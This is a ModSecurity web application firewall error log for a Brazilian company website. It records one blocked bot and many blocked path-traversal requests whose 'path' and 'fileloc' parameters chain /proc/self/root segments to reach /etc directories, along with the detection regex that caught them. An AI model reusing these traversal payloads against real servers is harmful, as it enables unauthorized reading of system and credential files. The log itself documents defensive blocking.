[Mon Mar 16 19:07:08.819191 2026] [:error] [pid 10651:tid 140411548894976] [client 74.7.228.16:48002] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abh_DLysWC90G-1nBrBotgAAAZc"]
[Mon Mar 16 19:07:37.513809 2026] [:error] [pid 29802:tid 140411607643904] [client 74.7.241.46:56214] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_Kc_BxrYCr4hPDw8NrAAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:08:02.948468 2026] [:error] [pid 29507:tid 140411708356352] [client 74.7.241.46:42158] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_Qkr9dMAiw-8KANNsCwAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:08:05.227436 2026] [:error] [pid 29802:tid 140411540502272] [client 74.7.241.46:35226] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_Rc_BxrYCr4hPDw8NuAAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:08:06.602293 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.241.46:35238] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_RqTCbgAP5jq5TehN2gAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:08:08.830589 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.241.46:35254] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_SLysWC90G-1nBrBowgAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:08:10.109605 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.241.46:49050] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_SlajLEzk2WiQ-101nAAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:08:13.371166 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.241.46:49052] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_TbysWC90G-1nBrBoyQAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:08:14.855241 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.241.46:49062] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_TrABkC4fWIHEf8EcUAAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:08:16.053992 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.241.46:49078] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_ULABkC4fWIHEf8EcUgAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:08:18.367917 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.241.46:49090] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_UtSswJuvopo3lOiDxwAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:08:19.717328 2026] [:error] [pid 14895:tid 140411548894976] [client 74.7.241.46:39072] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_U1ajLEzk2WiQ-101ngAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:08:21.915460 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.241.46:39086] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_VY6lpbStxTqkSkuMGQAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:08:23.244152 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.241.46:39098] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_V_9ocpUE4ed4uDwW0gAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:08:26.222890 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.241.46:39112] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_WaQpVkWug9HeOt9WuQAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:08:27.678979 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.241.46:39126] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_W_9ocpUE4ed4uDwW1QAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:08:28.904311 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.241.46:55120] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_XLABkC4fWIHEf8EcVgAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:08:30.258955 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.241.46:55134] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_XrysWC90G-1nBrBo1wAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:08:35.655347 2026] [:error] [pid 15568:tid 140411699963648] [client 74.7.243.203:57534] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_Y6QpVkWug9HeOt9WxAAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:08:40.350986 2026] [:error] [pid 29507:tid 140411574073088] [client 74.7.243.203:36636] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_Z0r9dMAiw-8KANNsGAAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:08:49.518466 2026] [:error] [pid 14895:tid 140411540502272] [client 74.7.243.203:40672] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_cVajLEzk2WiQ-101sAAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:08:51.272335 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.241.46:55146] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_c_9ocpUE4ed4uDwW6wAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
